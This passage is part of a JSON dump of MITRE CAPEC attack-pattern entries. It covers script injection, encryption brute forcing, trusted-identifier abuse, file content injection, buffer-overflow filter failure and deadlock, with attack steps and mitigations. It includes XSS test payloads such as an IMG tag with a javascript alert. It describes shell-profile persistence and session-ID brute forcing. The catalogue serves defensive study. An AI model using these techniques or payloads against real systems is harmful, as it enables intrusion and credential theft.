Data"}]},"Mitigations":{"Mitigation":["In addition to the traditional input fields, all other user controllable inputs, such as image tags within messages or the likes, must also be subjected to input validation. Such validation should ensure that content that can be potentially interpreted as script by the browser is appropriately filtered.","All output displayed to clients must be properly escaped. Escaping ensures that the browser interprets special scripting characters literally and not as script to be executed."]},"Example_Instances":{"Example":{"p":["An online discussion forum allows its members to post HTML-enabled messages, which can also include image tags. A malicious user embeds JavaScript in the IMG tags in their messages that gets executed within the victim\'s browser whenever the victim reads these messages.","When executed within the victim\'s browser, the malicious script could accomplish a number of adversary objectives including stealing sensitive information such as usernames, passwords, or cookies."],"div":["<img src=javascript:alert(\'XSS\')>",{"style":"margin-left:10px;","class":"attack"}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"80"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Examples-Instances, Related_Attack_Patterns, Related_Vulnerabilities, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow"}],"Previous_Entry_Name":["Embedding Scripts in Non-Script Elements",{"Date":"2017-05-01"}]}},"19":{"ID":"19","Name":"Embedding Scripts within Scripts","Abstraction":"Standard","Status":"Stable","Description":"An attack of this type exploits a programs\' vulnerabilities that are brought on by allowing remote hosts to execute scripts. The adversary leverages this capability to execute their own script by embedding it within other scripts that the target software is likely to execute. The adversary must have the ability to inject their script into a script that is likely to be executed. If this is done, then the adversary can potentially launch a variety of probes and attacks against the web server\'s local environment, in many cases the so-called DMZ, back end resources the web server can communicate with, and other hosts. With the proliferation of intermediaries, such as Web App Firewalls, network devices, and even printers having JVMs and Web servers, there are many locales where an attacker can inject malicious scripts. Since this attack pattern defines scripts within scripts, there are likely privileges to execute said attack on the host. These attacks are not solely limited to the server side, client side scripts like Ajax and client side JavaScript can contain malicious scripts as well.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"242"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Spider] Using a browser or an automated tool, an attacker records all entry points for inputs that happen to be reflected in a client-side script element. These script elements can be located in the HTML content (head, body, comments), in an HTML tag, XML, CSS, etc.","Technique":["Use a spidering tool to follow and record all non-static links that are likely to have input parameters (through forms, URL, fragments, etc.) actively used by the Web application.","Use a proxy tool to record all links visited during a manual traversal of the web application.","Use a browser to manually explore the website and analyze how it is constructed. Many browsers\' plugins are available to facilitate the analysis or automate the discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Probe identified potential entry points for XSS vulnerability] The attacker uses the entry points gathered in the \\"Explore\\" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.","Technique":["Manually inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side script elements context and observe system behavior to determine if script was executed.","Manually inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a server-side script elements context and observe system behavior to determine if script was executed.","Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side script elements context and observe system behavior to determine if script was executed.","Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a server-side script elements context and observe system behavior to determine if script was executed.","Use a proxy tool to record results of the created requests."]},{"Step":"3","Phase":"Exploit","Description":"[Steal session IDs, credentials, page content, etc.] As the attacker succeeds in exploiting the vulnerability, they can choose to steal user\'s credentials in order to reuse or to analyze them later on.","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and sends document information to the attacker.","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute appropriately."]},{"Step":"4","Phase":"Exploit","Description":"[Forceful browsing] When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user\'s current network (Internet or not).","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and performs actions on the same web site","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities)."]},{"Step":"5","Phase":"Exploit","Description":"[Content spoofing] By manipulating the content, the attacker targets the information that the user would like to get from the website.","Technique":"Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and exposes attacker-modified invalid information to the user on the current web page."}]},"Prerequisites":{"Prerequisite":"Target software must be able to execute scripts, and also grant the adversary privilege to write/upload scripts."},"Skills_Required":{"Skill":["To load malicious script into open, e.g. world writable directory",{"Level":"Low"},"Executing remote scripts on host and collecting output",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Use browser technologies that do not allow client side scripting.","Utilize strict type, character, and encoding enforcement.","Server side developers should not proxy content via XHR or other means. If a HTTP proxy for remote content is setup on the server side, the client\'s browser has no way of discerning where the data is originating from.","Ensure all content that is delivered to client is sanitized against an acceptable content specification.","Perform input validation for all remote content.","Perform output validation for all remote content.","Disable scripting languages such as JavaScript in browser","Session tokens for specific host","Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.","Privileges are constrained, if a script is loaded, ensure system runs in chroot jail or other limited authority mode"]},"Example_Instances":{"Example":[{"p":["Ajax applications enable rich functionality for browser based web applications. Applications like Google Maps deliver unprecedented ability to zoom in and out, scroll graphics, and change graphic presentation through Ajax. The security issues that an attacker may exploit in this instance are the relative lack of security features in JavaScript and the various browser\'s implementation of JavaScript, these security gaps are what XSS and a host of other client side vulnerabilities are based on. While Ajax may not open up new security holes, per se, due to the conversational aspects between client and server of Ajax communication, attacks can be optimized. A single zoom in or zoom out on a graphic in an Ajax application may round trip to the server dozens of times. One of the first steps many attackers take is frequently footprinting an environment, this can include scanning local addresses like 192.*.*.* IP addresses, checking local directories, files, and settings for known vulnerabilities, and so on.","The XSS script that is embedded in a given IMG tag can be manipulated to probe a different address on every click of the mouse or other motions that the Ajax application is aware of.","In addition the enumerations allow for the attacker to nest sequential logic in the attacks. While Ajax applications do not open up brand new attack vectors, the existing attack vectors are more than adequate to execute attacks, and now these attacks can be optimized to sequentially execute and enumerate host environments."],"div":["<IMG SRC=javascript:alert(\'XSS\')>",{"style":"margin-left:10px;","class":"informative"}]},"~/.bash_profile and ~/.bashrc are executed in a user\'s context when a new shell opens or when a user logs in so that their environment is set correctly. ~/.bash_profile is executed for login shells and ~/.bashrc is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), ~/.bash_profile is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, ~/.bashrc is executed. This allows users more fine grained control over when they want certain commands executed. These files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into these files to gain persistence each time a user logs in or opens a new shell."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1546.004","Entry_Name":"Event Triggered Execution:.bash_profile and .bashrc"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, References, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Examples-Instances, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Execution_Flow, Taxonomy_Mappings"}]}},"20":{"ID":"20","Name":"Encryption Brute Forcing","Abstraction":"Standard","Status":"Draft","Description":"An attacker, armed with the cipher text and the encryption algorithm used, performs an exhaustive (brute force) search on the key space to determine the key that decrypts the cipher text to obtain the plaintext.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"112"},{"Nature":"CanPrecede","CAPEC_ID":"668"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"Determine the ciphertext and the encryption algorithm."},{"Step":"2","Phase":"Experiment","Description":"Perform an exhaustive brute force search of the key space, producing candidate plaintexts and observing if they make sense."}]},"Prerequisites":{"Prerequisite":["Ciphertext is known.","Encryption algorithm and key size are known."]},"Skills_Required":{"Skill":["Brute forcing encryption does not require much skill.",{"Level":"Low"}]},"Resources_Required":{"Resource":{"p":["A powerful enough computer for the job with sufficient CPU, RAM and HD. Exact requirements will depend on the size of the brute force job and the time requirement for completion. Some brute forcing jobs may require grid or distributed computing (e.g. DES Challenge).","On average, for a binary key of size N, 2^(N/2) trials will be needed to find the key that would decrypt the ciphertext to obtain the original plaintext.","Obviously as N gets large the brute force approach becomes infeasible."]}},"Indicators":{"Indicator":"None. This attack happens offline."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Use commonly accepted algorithms and recommended key sizes. The key size used will depend on how important it is to keep the data confidential and for how long.","In theory a brute force attack performing an exhaustive key space search will always succeed, so the goal is to have computational security. Moore\'s law needs to be taken into account that suggests that computing resources double every eighteen months."]},"Example_Instances":{"Example":"In 1997 the original DES challenge used distributed net computing to brute force the encryption key and decrypt the ciphertext to obtain the original plaintext. Each machine was given its own section of the key space to cover. The ciphertext was decrypted in 96 days."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"326"},{"CWE_ID":"327"},{"CWE_ID":"693"},{"CWE_ID":"1204"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"}}},"21":{"ID":"21","Name":"Exploitation of Trusted Identifiers","Abstraction":"Meta","Status":"Stable","Description":{"p":["An adversary guesses, obtains, or \\"rides\\" a trusted identifier (e.g. session ID, resource ID, cookie, etc.) to perform authorized actions under the guise of an authenticated user or service. Attacks leveraging trusted identifiers typically result in the adversary laterally moving within the local network, since users are often allowed to authenticate to systems/applications within the network using the same identifier. This allows the adversary to obtain sensitive data, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more.","Attacks on trusted identifiers take advantage of the fact that some software accepts user input without verifying its authenticity. Many server side processes are vulnerable to these attacks because the server to server communications have not been analyzed from a security perspective or the processes \\"trust\\" other systems because they are behind a firewall. Similarly, servers that use easy to guess or spoofable schemes for representing digital identity can also be vulnerable. Such systems frequently use schemes without cryptography and digital signatures (or with broken cryptography). Identifiers may be guessed or obtained due to insufficient randomness, poor protection (passed/stored in the clear), lack of integrity (unsigned), or improper correlation with access control policy enforcement points. Exposed configuration and properties files that contain sensitive data may additionally provide an adversary with the information needed to obtain these identifiers. An adversary may also \\"ride\\" an identifier via a malicious link, as is the case in Cross Site Request Forgery (CSRF) attacks.","Regardless of the attack vector, successful spoofing and impersonation of trusted credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application."]},"Likelihood_Of_Attack":"High","Typical_Severity":"High","Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the application for Indicators of Susceptibility] Using a variety of methods, until one is found that applies to the target, the adversary probes for cookies, session tokens, or entry points that bypass identifiers altogether.","Technique":["Spider all available pages","Attack known bad interfaces","Search outward-facing configuration and properties files for identifiers."]},{"Step":"2","Phase":"Experiment","Description":"[Fetch samples] The adversary fetches many samples of identifiers. This may be through legitimate access (logging in, legitimate connections, etc.) or via systematic probing.","Technique":["An adversary makes many anonymous connections and records the session IDs assigned.","An adversary makes authorized connections and records the session tokens or credentials issued.","An adversary gains access to (legitimately or illegitimately) a nearby system (e.g., in the same operations network, DMZ, or local network) and makes a connection from it, attempting to gain the same privileges as a trusted system."]},{"Step":"3","Phase":"Exploit","Description":"[Impersonate] An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application"},{"Step":"4","Phase":"Exploit","Description":"[Spoofing] Malicious data can be injected into the target system or into a victim user\'s system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks."},{"Step":"5","Phase":"Exploit","Description":"[Data Exfiltration] The adversary can obtain sensitive data contained within the system or application."}]},"Prerequisites":{"Prerequisite":["Server software must rely on weak identifier proof and/or verification schemes.","Identifiers must have long lifetimes and potential for reusability.","Server software must allow concurrent sessions to exist."]},"Skills_Required":{"Skill":["To achieve a direct connection with the weak or non-existent server session access control, and pose as an authorized user",{"Level":"Low"}]},"Resources_Required":{"Resource":["Ability to deploy software on network.","Ability to communicate synchronously or asynchronously with server."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authentication"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Design: utilize strong federated identity such as SAML to encrypt and sign identity tokens in transit.","Implementation: Use industry standards session key generation mechanisms that utilize high amount of entropy to generate the session key. Many standard web and application servers will perform this task on your behalf.","Implementation: If the identifier is used for authentication, such as in the so-called single sign on use cases, then ensure that it is protected at the same level of assurance as authentication tokens.","Implementation: If the web or application server supports it, then encrypting and/or signing the identifier (such as cookie) can protect the ID if intercepted.","Design: Use strong session identifiers that are protected in transit and at rest.","Implementation: Utilize a session timeout for all sessions, for example 20 minutes. If the user does not explicitly logout, the server terminates their session after this period of inactivity. If the user logs back in then a new session key is generated.","Implementation: Verify authenticity of all identifiers at runtime."]},"Example_Instances":{"Example":[{"p":["Thin client applications like web applications are particularly vulnerable to session ID attacks. Since the server has very little control over the client, but still must track sessions, data, and objects on the server side, cookies and other mechanisms have been used to pass the key to the session data between the client and server. When these session keys are compromised it is trivial for an adversary to impersonate a user\'s session in effect, have the same capabilities as the authorized user. There are two main ways for an adversary to exploit session IDs.","A brute force attack involves an adversary repeatedly attempting to query the system with a spoofed session header in the HTTP request. A web server that uses a short session ID can be easily spoofed by trying many possible combinations so the parameters session-ID= 1234 has few possible combinations, and an adversary can retry several hundred or thousand request with little to no issue on their side.","The second method is interception, where a tool such as wireshark is used to sniff the wire and pull off any unprotected session identifiers. The adversary can then use these variables and access the application."]},"For example, in a message queuing system that allows service requesters to post messages to its queue through an open channel (such as anonymous FTP), authorization is done through checking group or role membership contained in the posted message. However, there is no proof that the message itself, the information in the message (such group or role membership), or the process that wrote the message to the queue is authentic and authorized to do so."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"290"},{"CWE_ID":"302"},{"CWE_ID":"346"},{"CWE_ID":"539"},{"CWE_ID":"6"},{"CWE_ID":"384"},{"CWE_ID":"664"},{"CWE_ID":"602"},{"CWE_ID":"642"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1134","Entry_Name":"Access Token Manipulation"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, @Status, Consequences, Description, Example_Instances, Execution_Flow, Mitigations, Prerequisites, Resources_Required, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}],"Previous_Entry_Name":["Exploitation of Session Variables, Resource IDs and other Trusted Credentials",{"Date":"2015-11-09"},"Exploitation of Trusted Credentials",{"Date":"2020-07-30"}]}},"22":{"ID":"22","Name":"Exploiting Trust in Client","Abstraction":"Meta","Status":"Draft","Description":"An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Prerequisites":{"Prerequisite":"Server software must rely on client side formatted and validated values, and not reinforce these checks on the server side."},"Skills_Required":{"Skill":["The attacker must have fairly detailed knowledge of the syntax and semantics of client/server communications protocols and grammars",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Ability to communicate synchronously or asynchronously with server"},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Design: Ensure that client process and/or message is authenticated so that anonymous communications and/or messages are not accepted by the system.","Design: Do not rely on client validation or encoding for security purposes.","Design: Utilize digital signatures to increase authentication assurance.","Design: Utilize two factor authentication to increase authentication assurance.","Implementation: Perform input validation for all remote content."]},"Example_Instances":{"Example":["Web applications may use JavaScript to perform client side validation, request encoding/formatting, and other security functions, which provides some usability benefits and eliminates some client-server round-tripping. However, the web server cannot assume that the requests it receives have been subject to those validations, because an attacker can use an alternate method for crafting the HTTP Request and submit data that contains poisoned values designed to spoof a user and/or get the web server to disclose information.","Web 2.0 style applications may be particularly vulnerable because they in large part rely on existing infrastructure which provides scalability without the ability to govern the clients. Attackers identify vulnerabilities that either assume the client side is responsible for some security services (without the requisite ability to ensure enforcement of these checks) and/or the lack of a hardened, default deny server configuration that allows for an attacker probing for weaknesses in unexpected ways. Client side validation, request formatting and other services may be performed, but these are strictly usability enhancements not security enhancements.","Many web applications use client side scripting like JavaScript to enforce authentication, authorization, session state and other variables, but at the end of day they all make requests to the server. These client side checks may provide usability and performance gains, but they lack integrity in terms of the http request. It is possible for an attacker to post variables directly to the server without using any of the client script security checks and customize the patterns to impersonate other users or probe for more information.","Many message oriented middleware systems like MQ Series are rely on information that is passed along with the message request for making authorization decisions, for example what group or role the request should be passed. However, if the message server does not or cannot authenticate the authorization information in the request then the server\'s policy decisions about authorization are trivial to subvert because the client process can simply elevate privilege by passing in elevated group or role information which the message server accepts and acts on."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"290"},{"CWE_ID":"287"},{"CWE_ID":"20"},{"CWE_ID":"200"},{"CWE_ID":"693"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Description"}],"Previous_Entry_Name":["Exploiting Trust in Client (aka Make the Client Invisible)",{"Date":"2015-12-07"}]}},"23":{"ID":"23","Name":"File Content Injection","Abstraction":"Standard","Status":"Draft","Description":"An attack of this type exploits the host\'s trust in executing remote content, including binary files. The files are poisoned with a malicious payload (targeting the file systems accessible by the target software) by the adversary and may be passed through standard channels such as via email, and standard web content like PDF and multimedia files. The adversary exploits known vulnerabilities or handling routines in the target processes. Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the adversary knows the standard handling routines and can identify vulnerabilities and entry points, they can be exploited by otherwise seemingly normal content. Once the attack is executed, the adversary\'s program can access relative directories such as C:\\\\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"242"},{"Nature":"CanAlsoBe","CAPEC_ID":"165"}]},"Prerequisites":{"Prerequisite":["The target software must consume files.","The adversary must have access to modify files that the target software will consume."]},"Skills_Required":{"Skill":["How to poison a file with malicious payload that will exploit a vulnerability when the file is opened. The adversary must also know how to place the file onto a system where it will be opened by an unsuspecting party, or force the file to be opened.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}},"Mitigations":{"Mitigation":["Design: Enforce principle of least privilege","Design: Validate all input for content including files. Ensure that if files and remote content must be accepted that once accepted, they are placed in a sandbox type location so that lower assurance clients cannot write up to higher assurance processes (like Web server processes for example)","Design: Execute programs with constrained privileges, so parent process does not open up further vulnerabilities. Ensure that all directories, temporary directories and files, and memory are executing with limited privileges to protect against remote execution.","Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host.","Implementation: Virus scanning on host","Implementation: Host integrity monitoring for critical files, directories, and processes. The goal of host integrity monitoring is to be aware when a security issue has occurred so that incident response and other forensic activities can begin."]},"Example_Instances":{"Example":{"p":"PHP is a very popular language used for developing web applications. When PHP is used with global variables, a vulnerability may be opened that affects the file system. A standard HTML form that allows for remote users to upload files, may also place those files in a public directory where the adversary can directly access and execute them through a browser. This vulnerability allows remote adversaries to execute arbitrary code on the system, and can result in the adversary being able to erase intrusion evidence from system and application logs."}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"20"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Examples-Instances, Payload_Activation_Impact"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Example_Instances, References"}],"Previous_Entry_Name":["File System Function Injection, Content Based",{"Date":"2015-12-07"}]}},"24":{"ID":"24","Name":"Filter Failure through Buffer Overflow","Abstraction":"Detailed","Status":"Draft","Description":"In this attack, the idea is to cause an active filter to fail by causing an oversized transaction. An attacker may try to feed overly long input strings to the program in an attempt to overwhelm the filter (by causing a buffer overflow) and hoping that the filter does not fail securely (i.e. the user input is let into the system unfiltered).","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey] The attacker surveys the target application, possibly as a valid and authenticated user","Technique":["Spidering web sites for inputs that involve potential filtering","Brute force guessing of filtered inputs"]},{"Step":"2","Phase":"Experiment","Description":"[Attempt injections] Try to feed overly long data to the system. This can be done manually or a dynamic tool (black box) can be used to automate this. An attacker can also use a custom script for that purpose.","Technique":["Brute force attack through black box penetration test tool.","Fuzzing of communications protocols","Manual testing of possible inputs with attack data."]},{"Step":"3","Phase":"Experiment","Description":"[Monitor responses] Watch for any indication of failure occurring. Carefully watch to see what happened when filter failure occurred. Did the data get in?","Technique":["Boron tagging. Choose clear attack inputs that are easy to notice in output. In binary this is often 0xa5a5a5a5 (alternating 1s and 0s). Another obvious tag value is all zeroes, but it is not always obvious what goes wrong if the null values get into the data.","Check Log files. An attacker with access to log files can look at the outcome of bad input."]},{"Step":"4","Phase":"Exploit","Description":"[Abuse the system through filter failure] An attacker writes a script to consistently induce the filter failure.","Technique":["DoS through filter failure. The attacker causes the system to crash or stay down because of its failure to filter properly.","Malicious code execution. An attacker introduces a malicious payload and executes arbitrary code on the target system.","An attacker can use the filter failure to introduce malicious data into the system and leverage a subsequent SQL injection, Cross Site Scripting, Command Injection or similar weakness if it exists."]}]},"Prerequisites":{"Prerequisite":"Ability to control the length of data passed to an active filter."},"Skills_Required":{"Skill":["An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.",{"Level":"Low"},"Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.",{"Level":"High"}]},"Indicators":{"Indicator":"Many exceptions are thrown by the application\'s filter modules in a short period of time. Check the logs. See if the probes are coming from the same IP address."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":["Make sure that ANY failure occurring in the filtering or input validation routine is properly handled and that offending input is NOT allowed to go through. Basically make sure that the vault is closed when failure occurs.","Pre-design: Use a language or compiler that performs automatic bounds checking.","Pre-design through Build: Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.","Operational: Use OS-level preventative functionality. Not a complete solution.","Design: Use an abstraction library to abstract away risky APIs. Not a complete solution."]},"Example_Instances":{"Example":[{"div":["Attack Example: Filter Failure in Taylor UUCP Daemon",{"style":"color:#32498D; font-weight:bold;"}],"p":"Sending in arguments that are too long to cause the filter to fail open is one instantiation of the filter failure attack. The Taylor UUCP daemon is designed to remove hostile arguments before they can be executed. If the arguments are too long, however, the daemon fails to remove them. This leaves the door open for attack."},"A filter is used by a web application to filter out characters that may allow the input to jump from the data plane to the control plane when data is used in a SQL statement (chaining this attack with the SQL injection attack). Leveraging a buffer overflow the attacker makes the filter fail insecurely and the tainted data is permitted to enter unfiltered into the system, subsequently causing a SQL injection.","Audit Truncation and Filters with Buffer Overflow. Sometimes very large transactions can be used to destroy a log file or cause partial logging failures. In this kind of attack, log processing code might be examining a transaction in real-time processing, but the oversized transaction causes a logic branch or an exception of some kind that is trapped. In other words, the transaction is still executed, but the logging or filtering mechanism still fails. This has two consequences, the first being that you can run transactions that are not logged in any way (or perhaps the log entry is completely corrupted). The second consequence is that you might slip through an active filter that otherwise would stop your attack."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"119"},{"CWE_ID":"118"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"733"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"}]}},"25":{"ID":"25","Name":"Forced Deadlock","Abstraction":"Meta","Status":"Stable","Description":"The adversary triggers and exploits a deadlock condition in the target software to cause a denial of service. A deadlock can occur when two or more competing actions are waiting for each other to finish, and thus neither ever does. Deadlock conditions can be difficult to detect.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The adversary initiates an exploratory phase to get familiar with the system."},{"Step":"2","Phase":"Explore","Description":"The adversary triggers a first action (such as holding a resource) and initiates a second action which will wait for the first one to 